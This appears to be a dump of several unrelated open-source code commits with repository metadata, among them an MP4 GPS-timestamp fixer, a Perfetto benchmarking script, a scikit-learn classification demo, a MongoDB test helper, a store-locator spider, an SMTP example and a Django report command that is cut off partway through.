    field via hachoir.  Writes to '<filepath>.new'; replaces the original
    only when *overwrite* is true.  Returns False when no fix was found.
    """
    newpath = filepath + '.new'
    payloads, parser = gpmf.extract.get_gpmf_payloads_from_file(filepath)
    have_fix = False
    starttime = None
    for gpmf_data, timestamps in payloads:
        for element, parents in gpmf.parse.recursive(gpmf_data):
            if element.key == b'GPSF' and gpmf.parse.parse_value(element) > 0:
                have_fix = True
            if have_fix and element.key == b'GPSU':
                gpstime = gpmf.parse.parse_value(element)
                # timestamps[0] is the payload start in milliseconds.
                starttime = gpstime - datetime.timedelta(seconds=timestamps[0] / 1000)
                break
    if not starttime:
        print("ERROR: No GPS fix/time found")
        return False
    # We happen to know this is always in UTC so we can just drop the tzinfo
    starttime_naive = starttime.replace(tzinfo=None)
    # Create editor and adjust timestamps
    editor = hachoir.editor.createEditor(parser)
    changed = False
    for atom in locate_fields_by_subpath(parser, 'creation_date'):
        cd = editor[atom.path]
        if cd.value == starttime_naive:
            continue
        cd.value = starttime_naive
        changed = True
    if not changed:
        # Nothing differed; no .new file is written in this case.
        print("INFO: Nothing was changed")
        return True
    # Write the changed data
    output = hachoir.stream.FileOutputStream(newpath)
    with output:
        editor.writeInto(output)
    if overwrite:
        shutil.move(newpath, filepath)
    return True
# CLI: fix_mp4_timestamp.py <file> [overwrite-flag 0/1]
if __name__ == '__main__':
    import sys
    overwrite = False
    if len(sys.argv) > 2:
        overwrite = bool(int(sys.argv[2]))
    result = fix_file_timestamp(sys.argv[1], overwrite)
    if not result:
        sys.exit(1)
| mit | Python | |
5a36c269a89d5c2a835696a817ea24ea4d4ce72e | add script to performance of trace processor ingestion am: c893b17841 am: 69ca53841e am: b084bd3e82 | google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto | tools/measure_tp_performance.py | tools/measure_tp_performance.py | #!/usr/bin/env python3
# Copyright (C) 2021 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import re
import signal
import sys
import subprocess
import psutil
# Repository root (two levels above this tools/ script).
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Matches trace_processor's "Trace loaded: X MB in Ys (Z MB/s)" stderr line;
# group 2 is the load time in seconds.
REGEX = re.compile(
    '.*Trace loaded: ([0-9.]+) MB in ([0-9.]+)s \(([0-9.]+) MB/s\)')
def run_tp_until_ingestion(args, env):
    """Launch trace_processor_shell and wait for the 'Trace loaded' line.

    Returns (process, failed, load_time_seconds_str); the process is left
    running with stdin open so the caller can keep it alive and close it.
    Fix: when the process dies before printing the load line, `match` is
    None and the original crashed on `match[2]` — we now return None for
    the time instead.
    """
    tp_args = [os.path.join(args.out, 'trace_processor_shell'), args.trace_file]
    if not args.ftrace_raw:
        tp_args.append('--no-ftrace-raw')
    tp = subprocess.Popen(
        tp_args,
        stdin=subprocess.PIPE,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.PIPE,
        universal_newlines=True,
        env=env)

    lines = []
    while True:
        line = tp.stderr.readline()
        lines.append(line)

        match = REGEX.match(line)
        if match:
            break

        if tp.poll():
            break

    ret = tp.poll()
    fail = ret is not None and ret > 0
    if fail:
        print("Failed")
        for line in lines:
            sys.stderr.write(line)
    return tp, fail, match[2] if match else None
def heap_profile_run(args, dump_at_max: bool):
    """Ingest the trace once under heapprofd and record a heap profile.

    Builds a heapprofd config via tools/heap_profile, feeds it to a
    background `perfetto` recorder, then runs trace_processor with the
    heapprofd preload injected via LD_PRELOAD.  The profile is stopped
    with SIGINT; the output file is deleted if ingestion failed.
    """
    profile_args = [
        os.path.join(ROOT_DIR, 'tools', 'heap_profile'), '-i', '1', '-n',
        'trace_processor_shell', '--print-config'
    ]
    if dump_at_max:
        profile_args.append('--dump-at-max')
    config = subprocess.check_output(
        profile_args,
        stderr=subprocess.DEVNULL,
    )
    # Output name encodes which mode was profiled: peak vs resting usage.
    out_file = os.path.join(
        args.result, args.result_prefix + ('max' if dump_at_max else 'rest'))
    perfetto_args = [
        os.path.join(args.out, 'perfetto'), '-c', '-', '--txt', '-o', out_file
    ]
    profile = subprocess.Popen(
        perfetto_args,
        stdin=subprocess.PIPE,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL)
    profile.stdin.write(config)
    profile.stdin.close()

    env = {
        'LD_PRELOAD': os.path.join(args.out, 'libheapprofd_glibc_preload.so'),
        'TRACE_PROCESSOR_NO_MMAP': '1',
        # Make heapprofd initialise synchronously so the whole run is profiled.
        'PERFETTO_HEAPPROFD_BLOCKING_INIT': '1'
    }
    (tp, fail, _) = run_tp_until_ingestion(args, env)
    profile.send_signal(signal.SIGINT)
    profile.wait()

    tp.stdin.close()
    tp.wait()

    if fail:
        os.remove(out_file)
def regular_run(args):
    """Ingest the trace once and report wall time plus anonymous RSS."""
    env = {'TRACE_PROCESSOR_NO_MMAP': '1'}
    tp, fail, elapsed = run_tp_until_ingestion(args, env)

    # Sum the anonymous portion of every mapping of the live process.
    proc_info = psutil.Process(tp.pid)
    anon_bytes = 0
    for mapping in proc_info.memory_maps():
        anon_bytes += mapping.anonymous

    tp.stdin.close()
    tp.wait()

    print(f'Time taken: {elapsed}s, Memory: {anon_bytes / 1024.0 / 1024.0}MB')
def only_sort_run(args):
    """Measure only the sorting stage (TRACE_PROCESSOR_SORT_ONLY=1)."""
    env = {
        'TRACE_PROCESSOR_NO_MMAP': '1',
        'TRACE_PROCESSOR_SORT_ONLY': '1',
    }
    tp, fail, elapsed = run_tp_until_ingestion(args, env)

    tp.stdin.close()
    tp.wait()

    print(f'Time taken: {elapsed}s')
def main():
    """Parse CLI args, start the traced daemon, run all four benchmarks."""
    parser = argparse.ArgumentParser(
        description="This script measures the running time of "
        "ingesting a trace with trace processor as well as profiling "
        "trace processor's memory usage with heapprofd")
    parser.add_argument('--out', type=str, help='Out directory', required=True)
    parser.add_argument(
        '--result', type=str, help='Result directory', required=True)
    parser.add_argument(
        '--result-prefix', type=str, help='Result file prefix', required=True)
    parser.add_argument(
        '--ftrace-raw',
        action='store_true',
        help='Whether to ingest ftrace into raw table',
        default=False)
    parser.add_argument('trace_file', type=str, help='Path to trace')
    args = parser.parse_args()

    # The tracing service must be running for heapprofd/perfetto recording.
    traced = subprocess.Popen([os.path.join(args.out, 'traced')],
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL)

    print('Heap profile dump at max')
    heap_profile_run(args, dump_at_max=True)

    print('Heap profile dump at resting')
    heap_profile_run(args, dump_at_max=False)

    print('Regular run')
    regular_run(args)

    print('Only sort run')
    only_sort_run(args)

    # Shut the daemon down cleanly.
    traced.send_signal(signal.SIGINT)
    traced.wait()
# Script entry point.
if __name__ == "__main__":
    main()
| apache-2.0 | Python | |
def factorial(n):
    """Return n!; any value below 2 (including negatives) yields 1."""
    product = 1
    for factor in range(2, n + 1):
        product *= factor
    return product
# Interactive driver (Python 2: raw_input / print statement).
if __name__ == "__main__":
    n = raw_input("n: ")
    print "result is:", factorial(int(n))
| apache-2.0 | Python | |
08e52c671ef405c34e532f1ca29e7fc2ee6892d9 | Add python script that should submit to view.cwl API | curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g | viewcwl-json.py | viewcwl-json.py | #!/usr/bin/env python
import fnmatch
import requests
import time
import os
import glob
# You can alternatively define these in travis.yml as env vars or arguments
BASE_URL = 'https://view.commonwl.org'
WORKFLOW_PATH = '/workflows/workflow.cwl'
# Collect every .cwl file under cwl-version/ (currently only printed;
# the submission below uses a single hard-coded path instead).
matches = []
for root, dirnames, filenames in os.walk('cwl-version'):
    for filename in fnmatch.filter(filenames, '*.cwl'):
        matches.append(os.path.join(root, filename))
print matches
REPO_SLUG = 'curoverse/l7g/tree/master/'
#Testing WORKFLOW_PATH
WORKFLOW_PATH = 'cwl-version/npy/cwl/cwl_steps/tiling_consol-npy.cwl'
#This will loop through matches, need to indent everything after to make work
#for WORKFLOW_PATH in matches:
# Whole workflow URL on github
workflowURL = 'https://github.com/' + REPO_SLUG + WORKFLOW_PATH
print workflowURL,'\n'
# Headers
HEADERS = {
    'user-agent': 'my-app/0.0.1',
    'accept': 'application/json'
}
# Add new workflow with the specific commit ID of this build
addResponse = requests.post(BASE_URL + '/workflows',
                            data={'url': workflowURL},
                            headers=HEADERS)
if addResponse.status_code == requests.codes.accepted:
    qLocation = addResponse.headers['location']
    # Poll the queue item until cwltool stops reporting RUNNING (max ~25s).
    qResponse = requests.get(BASE_URL + qLocation,
                             headers=HEADERS,
                             allow_redirects=False)
    maxAttempts = 5
    while qResponse.status_code == requests.codes.ok and qResponse.json()['cwltoolStatus'] == 'RUNNING' and maxAttempts > 0:
        time.sleep(5)
        qResponse = requests.get(BASE_URL + qLocation,
                                 headers=HEADERS,
                                 allow_redirects=False)
        maxAttempts -= 1
    # NOTE(review): 'location' may be absent from the headers on failure,
    # which would raise KeyError here — confirm against the API.
    if qResponse.headers['location']:
        # Success, get the workflow
        workflowResponse = requests.get(BASE_URL + qResponse.headers['location'], headers=HEADERS)
        if (workflowResponse.status_code == requests.codes.ok):
            workflowJson = workflowResponse.json()
            # Do what you want with the workflow JSON
            # Include details in documentation files etc
            print(BASE_URL + workflowJson['visualisationSvg'])
            print('Verified with cwltool version ' + workflowJson['cwltoolVersion'])
            # etc...
        else:
            print('Could not get returned workflow')
    elif qResponse.json()['cwltoolStatus'] == 'ERROR':
        # Cwltool failed to run here
        print(qResponse.json()['message'])
    elif maxAttempts == 0:
        print('Timeout: Cwltool did not finish')
    else:
        print('Error adding workflow')
| agpl-3.0 | Python | |
9700cf8aa468ce364067d1cdf80cd5e968aef08a | Create classification_examples.py | mcStargazer/nlp_talk_apr2017 | classification_examples.py | classification_examples.py | # -*- coding: utf-8 -*-
##############################################################################
# references
##############################################################################
# www.udemy.com/machinelearning/ - I really enjoyed this course. Take it!
# original data/code at www.superdatascience.com/machine-learning/
# en.wikipedia.org/wiki/Statistical_classification
# en.wikipedia.org/wiki/Confusion_matrix
##############################################################################
# import the libraries
##############################################################################
# look to the future if running on Python 2.7
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# importing the standard libraries
import os
import sys
# import 3rd party libraries
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
import pandas as pd
from sklearn.metrics import confusion_matrix
from sklearn.tree import DecisionTreeClassifier as DTC
from sklearn.naive_bayes import GaussianNB as GNB
from sklearn.ensemble import RandomForestClassifier as RFC
from sklearn.preprocessing import StandardScaler
from sklearn.cross_validation import train_test_split as split
# importing local
sys.path.append(os.path.abspath('.'))
##############################################################################
# user defined functions
##############################################################################
def plotter(X, y, title, x_label, y_label, model=None):
    """Plot a fitted binary classifier's decision regions over 2-D data.

    X: (n, 2) array of scaled features; y: binary labels.
    model: any estimator exposing .predict(); defaults to the module-level
    `classifier` (the original depended on that global implicitly — the
    optional parameter makes the dependency explicit and reusable).
    """
    clf = classifier if model is None else model
    # Dense grid over the feature plane, padded one unit on each side.
    X1, X2 = np.meshgrid(np.arange(start = X[:, 0].min() - 1,
                                   stop = X[:, 0].max() + 1,
                                   step = 0.01),
                         np.arange(start = X[:, 1].min() - 1,
                                   stop = X[:, 1].max() + 1,
                                   step = 0.01))
    # Shade each grid cell by its predicted class.
    plt.contourf(X1, X2,
                 clf.predict(np.array([X1.ravel(),
                                       X2.ravel()]).T).reshape(X1.shape),
                 alpha = 0.75,
                 cmap = ListedColormap(('red', 'green')))
    plt.xlim(X1.min(), X1.max())
    plt.ylim(X2.min(), X2.max())
    # Overlay the actual points, coloured by their true label.
    for i, j in enumerate(np.unique(y)):
        plt.scatter(X[y == j, 0], X[y == j, 1],
                    c = ListedColormap(('red', 'green'))(i), label = j)
    plt.title(title)
    plt.xlabel(x_label)
    plt.ylabel(y_label)
    plt.legend()
    plt.show()
##############################################################################
# prepare the data: read, split, and transform
##############################################################################
# read the dataset: columns 2-3 (Age, Estimated Salary) as features,
# column 4 (purchase decision) as the binary label
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values

# Splitting the dataset into the training set and test set
X_train, X_test, y_train, y_test = split(X, y, test_size=0.25, random_state=0)

# feature scaling: mandatory for distance-based learning, helpful in plotting
# (the scaler is fit on the training set only to avoid test-set leakage)
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)

##############################################################################
# build the model
##############################################################################

# uncomment a classifier, and change graph titles at end...
#classifier = DTC(criterion='entropy', random_state=0)
classifier = RFC(n_estimators=10, criterion='entropy', random_state=0)
#classifier = GNB()

# fit the model and predict the test set results
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
##############################################################################
# numerical assessment
##############################################################################
# set up the formats and header for reporting (fixed-width CSV-ish columns)
header = "{:>9s},{:>10s},{:>7s},{:>6s}"
rows = "{:>9.3f},{:>10.3f},{:>7.3f},{:>6.3f}"
# Making the Confusion Matrix and derivative metrics.
# NOTE(review): with sklearn's default label ordering for labels {0, 1},
# cm[0,0] is the count for class 0 (TN, not TP), so the formulas below
# actually compute precision/recall of the NEGATIVE class — confirm which
# class convention was intended before trusting these numbers.
cm = confusion_matrix(y_test, y_pred)
a = (cm[0,0] + cm[1,1])/np.sum(cm) # accuracy = (TP+TN)/(TP+TN+FP+FN)
p = cm[0,0]/(cm[0,0] + cm[1,0]) # precision = TP/(TP+FP) -- see NOTE above
c = cm[0,0]/(cm[0,0] + cm[0,1]) # completeness (recall) = TP/(TP+FN) -- see NOTE above
f1 = 2*p*c/(p + c) # harmonic blend of precision and completeness
# report the numbers
print(header.format("accuracy", "precision", "recall", "f1"))
print(rows.format(a, p, c, f1))
##############################################################################
# visual assessment
##############################################################################
# plot description -- the title must track whichever classifier is
# uncommented above; the active model at this point is the RandomForest
# (the original label still said "Decision Tree Classification")
method = "Random Forest Classification"
x_axis = "Age"
y_axis = "Estimated Salary"
# visualising the training set results
plotter(X_train, y_train, method + " (Training set)", x_axis, y_axis)
# visualising the test set results
plotter(X_test, y_test, method + " (Test set)", x_axis, y_axis)
##############################################################################
# further work...
##############################################################################
# work with domain specialists
# avoid overfitting
# avoid overly complicated models
# trying other classifiers
# varying (some, many, all) parameters for a given classifier
# don't specify the "random" state parameters
# n-fold cross validation
# other?
| mit | Python | |
f498610ce8b4d9ec4b010e16a9d738c937ff3c72 | add db only tests utility #96 | biothings/biothings.api,biothings/biothings.api | biothings/tests/hub.py | biothings/tests/hub.py |
# DatabaseCollectionTesting
# Author: Amiteshk Sharma
# https://github.com/amiteshksharma/Database-Testing
import pymongo
from jsonpath_ng import jsonpath, parse
class DatabaseCollectionTesting:
    """
    Constructor that takes in three items
    db_url - string - the mongoDB url to connect to
    db - string - name of DB to use
    collection - string - name of collection in db

    Assertion-style sanity checks for a MongoDB gene-document collection.
    Each test_* method raises AssertionError on failure.
    """
    def __init__(self, db_url, db, collection):
        # cheap guard: reject URLs that are clearly not MongoDB URLs
        if "mongo" not in db_url:
            raise ValueError
        self.database_url = db_url
        self.client = pymongo.MongoClient(db_url)
        self.db = self.client[db]
        self.collection = self.db[collection]

    # test to see if there exists only 1 item for an ID
    # _id - the document _id to query
    def test_field_unique_id(self, _id):
        get_item = self.collection.find({"_id": _id})
        item = list(get_item)
        assert len(item) == 1

    # check for all items within a taxid
    # taxid - the taxid of the document to query
    def test_field_taxid(self, taxid):
        get_items = self.collection.find({"taxid": taxid})
        item_list = list(get_items)
        assert len(item_list) >= 1

    # check all documents with the same taxid value carry the expected keys.
    # NOTE(review): name/ensembl/symbol are treated as optional (missing any
    # one of them passes); only a document missing some OTHER expected key
    # triggers the assert False — confirm this asymmetry is intentional.
    def test_documents_taxid(self, taxid):
        get_documents = self.collection.find({"taxid": taxid})
        doc_list = list(get_documents)
        sub_list = ['_id', 'taxid', 'name', 'ensembl', 'symbol']
        for doc in doc_list:
            keys = doc.keys()
            if not all(x in keys for x in sub_list):
                # may not contain a name attribute
                if "name" not in keys:
                    pass
                # may not contain the ensembl attribute
                elif "ensembl" not in keys:
                    pass
                # may not contain the symbol attribute
                elif "symbol" not in keys:
                    pass
                else:
                    assert False
        assert True

    # check an _id and make sure it does not exist
    # _id - the document _id to query
    def test_field_does_not_exist(self, _id):
        get_items = self.collection.find({"_id": _id})
        item_list = list(get_items)
        assert len(item_list) == 0

    # Check number of documents is correct
    # expected count - the expected count of documents with specific taxid
    def test_total_document_count(self, expected_count):
        get_all_document = self.collection.find()
        document_list = list(get_all_document)
        assert len(document_list) == expected_count

    # check the indices for the mongoDB database: either only the default
    # _id_ index, or the three expected indices
    def test_database_index(self):
        get_indices = self.collection.index_information()
        indices_list = list(get_indices)
        size = len(indices_list)
        # if only size 1, then it only has _id_ index
        if size == 1:
            assert all(x in indices_list for x in ['_id_'])
        elif size == 3:
            assert all(x in indices_list for x in ["_id_", "taxid_1", "entrezgene_1"])

    # test the name attribute on 10 randomly sampled documents; prints the
    # _id of any sampled document that lacks a name before failing
    def test_document_name(self):
        random_docs = self.collection.aggregate([{"$sample": {"size": 10}}])
        count = 0
        for doc in random_docs:
            if "name" in doc:
                count = count + 1
            else:
                print("_id for document with no name: " + doc["_id"])
        assert count == 10
assert count == 10
if __name__ == '__main__':
c = DatabaseCollectionTesting("mongodb://su05:27017", "genedoc", "mygene_allspecies_20191111_eeesndlz")
c.test_documents_taxid(29302)
| apache-2.0 | Python | |
af6b04531ebbb0d86bf0177f30e7691221e2b17e | fix date citation for gob's | suranap/boltons,siemens/boltons,kevinastone/boltons,neuropil/boltons,markrwilliams/boltons,mgaitan/boltons,doublereedkurt/boltons,zeroSteiner/boltons | boltons/easterutils.py | boltons/easterutils.py | # -*- coding: utf-8 -*-
def gobs_program():
    """
    A pure-Python implementation of Gob's Algorithm (2006). A brief
    explanation can be found here:
    https://www.youtube.com/watch?v=JbnjusltDHk
    """
    # Python 2 print statement (trailing comma suppresses the newline);
    # loops forever by design.
    while True:
        print "Penus",

if __name__ == '__main__':
    gobs_program()
| # -*- coding: utf-8 -*-
def gobs_program():
"""
A pure-Python implementation of Gob's Algorithm (2013). A brief
explanation can be found here:
https://www.youtube.com/watch?v=JbnjusltDHk
"""
while True:
print "Penus",
if __name__ == '__main__':
gobs_program()
| bsd-3-clause | Python |
caf0ea95a03b06e09e640799a1f0d959658373ab | Create email.py | IntegrarOffshore/Rastema,Alzemand/Rastema,Alzemand/Rastema,IntegrarOffshore/Rastema,Alzemand/Rastema,IntegrarOffshore/Rastema,IntegrarOffshore/Rastema,Alzemand/Rastema | models/email.py | models/email.py | import smtplib
# Credentials of the sending Gmail account
remetente = 'seu-email@gmail.com'
senha = 'sua-senha'

# Message details: recipient, subject and body text
destinatario = 'email-do-destinatario@qualquercoisa.com'
assunto = 'Enviando email com python'
texto = 'Esse email foi enviado usando python! :)'

# Assemble the raw message: CRLF-separated headers, a blank line,
# then the body (per RFC 5322)
msg = '\r\n'.join([
    'From: %s' % remetente,
    'To: %s' % destinatario,
    'Subject: %s' % assunto,
    '',
    '%s' % texto
])

# Send via Gmail's SMTP submission port, upgrading to TLS first
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(remetente,senha)
server.sendmail(remetente, destinatario, msg)
server.quit()
| mit | Python | |
a11b064622f8dd56f76828f396d29072ece50ab9 | Add Python benchmark | stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/erfcinv/benchmark/python/benchmark.scipy.py | lib/node_modules/@stdlib/math/base/special/erfcinv/benchmark/python/benchmark.scipy.py | #!/usr/bin/env python
"""Benchmark scipy.special.erfcinv."""
import timeit
name = "erfcinv"
repeats = 3
iterations = 1000000
def print_version():
    """Print the TAP version header line (must come first in TAP output)."""
    print("TAP version 13")
def print_summary(total, passing):
    """Print the benchmark summary.

    # Arguments

    * `total`: total number of tests
    * `passing`: number of passing tests

    """
    # Emit the trailing TAP plan and totals as one batch of lines.
    summary_lines = (
        "#",
        "1.." + str(total),  # TAP plan
        "# total " + str(total),
        "# pass " + str(passing),
        "#",
        "# ok",
    )
    for line in summary_lines:
        print(line)
def print_results(elapsed):
    """Print benchmark results.

    # Arguments

    * `elapsed`: elapsed time (in seconds)

    # Examples

    ``` python
    python> print_results(0.131009101868)
    ```
    """
    # `iterations` is the module-level iteration count shared by benchmark()
    rate = iterations / elapsed
    for line in ("  ---",
                 "  iterations: " + str(iterations),
                 "  elapsed: " + str(elapsed),
                 "  rate: " + str(rate),
                 "  ..."):
        print(line)
def benchmark():
    """Run the benchmark and print benchmark results in TAP format."""
    setup = "from scipy.special import erfcinv; from random import random;"
    # erfcinv expects an argument in (0, 2); 2.0*random() stays in [0, 2)
    stmt = "y = erfcinv(2.0*random() - 0.0)"

    t = timeit.Timer(stmt, setup=setup)

    print_version()
    # Use the module-level `repeats` constant instead of a hardcoded 3 so the
    # loop count always matches the TAP plan printed by print_summary();
    # range() (not the Python-2-only xrange) keeps the script portable.
    for i in range(repeats):
        print("# python::" + name)
        elapsed = t.timeit(number=iterations)
        print_results(elapsed)
        print("ok " + str(i + 1) + " benchmark finished")
    print_summary(repeats, repeats)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
4582d020ec6fe8ef6035fc4a4de484f557f2d026 | Add 025 | ufjfeng/leetcode-jf-soln,ufjfeng/leetcode-jf-soln | python/025_reverse_nodes_in_k_group.py | python/025_reverse_nodes_in_k_group.py | """
Given a linked list, reverse the nodes of a linked list k at a time and return
its modified list.
If the number of nodes is not a multiple of k then left-out nodes in the end
should remain as it is.
You may not alter the values in the nodes, only nodes itself may be changed.
Only constant memory is allowed.
For example, Given this linked list: 1->2->3->4->5
For k = 2, you should return: 2->1->4->3->5
For k = 3, you should return: 3->2->1->4->5
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def reverseKGroup(self, head, k):
        """
        Reverse the list in groups of k nodes; a final partial group is
        left untouched. O(n) time, O(1) extra space.

        :type head: ListNode
        :type k: int
        :rtype: ListNode
        """
        if head is None or k < 2:
            return head
        # dummy node in front of head so the first group is handled
        # uniformly with the rest
        h = ListNode(None)
        h.next = head
        p = h
        # p is the node just before the next group; reverseNextK returns
        # the new "just before" node, or None when fewer than k remain
        while p:
            p = self.reverseNextK(p, k)
        return h.next

    def reverseNextK(self, p, k):
        """
        Reverse the k nodes after p in place. Returns the node preceding
        the following group (the old first node of this group), or None
        if fewer than k nodes remain after p.
        """
        groupHead = p
        # walk ahead k nodes to confirm a full group exists
        for i in range(k):
            if p.next:
                p = p.next
            else:
                return None
        # standard in-place reversal of the k nodes after groupHead
        firstNode = groupHead.next
        prev = groupHead
        curr = groupHead.next
        for i in range(k):
            nextNode = curr.next
            curr.next = prev
            prev = curr
            curr = nextNode
        # firstNode is now the group's tail: link it to the remainder,
        # and point groupHead at the group's new first node (prev)
        firstNode.next = curr
        groupHead.next = prev
        return firstNode
| mit | Python | |
6e44d244a11664798be24a88681f37aad9b0329e | add url | palloc/face_t,palloc/face_t | backend-api/image_api/authapp/urls.py | backend-api/image_api/authapp/urls.py | # config: utf-8
from rest_framework import routers
from .views import *
# DRF router exposing the FaceImage viewset at /faceimage/
router = routers.DefaultRouter()
router.register(r'faceimage', FaceImageViewSet)
| mit | Python | |
48bfe2d20cca35885ad0a460679d0a951d0c584e | Add spider for Giant Eagle | iandees/all-the-places,iandees/all-the-places,iandees/all-the-places | locations/spiders/gianteagle.py | locations/spiders/gianteagle.py | # -*- coding: utf-8 -*-
import json
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
DAY_MAPPING = {
1: "Su",
2: "Mo",
3: "Tu",
4: "We",
5: "Th",
6: "Fr",
7: "Sa"
}
class GiantEagleSpider(scrapy.Spider):
    """Spider for Giant Eagle store locations, walking the paginated JSON API."""
    name = "gianteagle"
    # allowed_domains must be an iterable of domain strings; the original
    # ("www.gianteagle.com") was a plain string (missing trailing comma),
    # which scrapy's OffsiteMiddleware iterates character by character
    allowed_domains = ("www.gianteagle.com",)
    download_delay = 0.2
    start_urls = (
        'https://www.gianteagle.com/api/sitecore/locations/getlocationlistvm?q=&orderBy=geo.distance(storeCoordinate,%20geography%27POINT(-97.68194299999999%2030.2737366)%27)%20asc&skip=0',
    )
    items_per_page = 12  # api limit

    def parse_hours(self, hours):
        """Convert the API's per-day hour records into an opening_hours string."""
        o = OpeningHours()

        for h in hours:
            day = DAY_MAPPING[h['DayNumber']]
            open = h['Range'].get('Open')
            close = h['Range'].get('Close')
            if h['IsOpenedAllDay']:
                # open 24h: represent as the full day
                open = '0:00'
                close = '23:59'
            elif h['IsClosedAllDay']:
                continue  # closed days are simply omitted

            if open and close:
                o.add_range(day=day,
                            open_time=open,
                            close_time=close)

        return o.as_opening_hours()

    def parse_address(self, address):
        """Join non-empty address parts; '-' is the API's empty placeholder."""
        return ", ".join(filter(lambda x: bool(x and x != '-'),
                                [address['address_no'], address['lineOne'], address['lineTwo']]))

    def parse(self, response):
        """Yield one GeojsonPointItem per store, then request the next page."""
        page_regex = re.compile(r'skip=(\d+)')
        page = int(page_regex.search(response.url).group(1))

        stores = json.loads(response.body_as_unicode())['Locations'] or []

        for store in stores:
            # 'Main' marks the store's primary phone line
            telephone = [t['DisplayNumber'] for t in store['TelephoneNumbers'] if t['location']['Item2'] == 'Main']

            properties = dict(
                ref=store['Number']['Value'],
                name=store['Name'],
                addr_full=self.parse_address(store['Address']),
                lat=store['Address']['Coordinates']['Latitude'],
                lon=store['Address']['Coordinates']['Longitude'],
                country='US',
                city=store['Address']['City'],
                state=store['Address']['State']['Abbreviation'],
                postcode=store['Address']['Zip'],
                phone=telephone[0] if telephone else None,
                opening_hours=self.parse_hours(store['HoursOfOperation']),
                extras={
                    'number': store['Number']['Value'],
                    'display_name': store['StoreDisplayName']
                }
            )

            yield GeojsonPointItem(**properties)

        # an empty page means we have walked past the last store
        if stores:
            page += self.items_per_page
            yield scrapy.Request(url=page_regex.sub('skip={}'.format(page), response.url), dont_filter=True)
| mit | Python | |
d29e7ff4153ddcf616f8d03c08f6f95e3a348263 | Create command to calculate quantity of similar apps per app | bkosawa/admin-recommendation | crawler/management/commands/distribution_of_similar.py | crawler/management/commands/distribution_of_similar.py | import logging.config
from operator import or_
from django.core.management.base import BaseCommand
from crawler.models import *
logger = logging.getLogger('crawler.command')
class Command(BaseCommand):
    """Report how many similar-app links each app has (our data vs. Google's).

    Each report writes a CSV mapping <number of similar apps> to
    <number of apps with that many similars>.
    """

    help = 'Generate comparison between google similar app and ours'

    def handle(self, *args, **options):
        """Build both distributions and print a one-line summary of each."""
        apps, similar_apps, similar_apps_count \
            = self.my_similar_report('my_distribution.csv')
        google_apps, google_similar_apps, google_similar_apps_count \
            = self.google_similar_report('google_distribution.csv')

        self.stdout.write(self.style.SUCCESS(
            'Mine: {} apps and {} similar_apps from {}'.format(
                len(apps), len(similar_apps), similar_apps_count)))
        self.stdout.write(self.style.SUCCESS(
            'Google: {} apps and {} similar_apps from {}'.format(
                len(google_apps), len(google_similar_apps), google_similar_apps_count)))

    @staticmethod
    def my_similar_report(filename):
        """Write the distribution CSV for our SimilarApp table.

        Returns (source packages, similar packages, total link count).
        """
        result_dict = dict()
        similar_apps_count = SimilarApp.objects.count()
        apps = SimilarApp.objects.order_by().values_list('source_package', flat=True).distinct()
        similar_apps = SimilarApp.objects.order_by().values_list('similar_package', flat=True).distinct()

        # Union of every package appearing on either side of a link.
        # The original used reduce(or_, [...]) without importing
        # functools.reduce, which is a NameError on Python 3; the plain
        # set-union operator is equivalent.
        app_set = set(apps)
        similar_set = set(similar_apps)
        merged_set = app_set | similar_set

        for app in merged_set:
            logger.debug('App: {}'.format(app))
            my_similar_source = SimilarApp.objects.filter(source_package=app).all()
            my_similar_similar = SimilarApp.objects.filter(similar_package=app).all()
            my_similar = list(my_similar_source) + list(my_similar_similar)
            if not my_similar:
                continue

            # histogram: key = number of similar apps, value = app count
            if not len(my_similar) in result_dict:
                count = 0
            else:
                count = result_dict[len(my_similar)]
            result_dict[len(my_similar)] = count + 1
            logger.debug('Updated: {} with {}'.format(len(my_similar), count + 1))

        # `with` guarantees the file is closed even if a write fails
        with open(filename, 'w') as admin_file:
            for key in result_dict:
                admin_file.write('{};{}\n'.format(key, result_dict[key]))
        return apps, similar_apps, similar_apps_count

    @staticmethod
    def google_similar_report(filename):
        """Write the distribution CSV for Google's similar-app table.

        Returns (source packages, similar packages, total link count).
        """
        result_dict = dict()
        similar_apps_count = GoogleSimilarApp.objects.count()
        apps = GoogleSimilarApp.objects.order_by().values_list('source_package', flat=True).distinct()
        similar_apps = GoogleSimilarApp.objects.order_by().values_list('similar_package', flat=True).distinct()

        # see my_similar_report: set union replaces the unimported reduce(or_, ...)
        app_set = set(apps)
        similar_set = set(similar_apps)
        merged_set = app_set | similar_set

        for app in merged_set:
            google_similar = GoogleSimilarApp.objects.filter(source_package=app).all()
            if not google_similar:
                continue

            if not len(google_similar) in result_dict:
                count = 0
            else:
                count = result_dict[len(google_similar)]
            result_dict[len(google_similar)] = count + 1
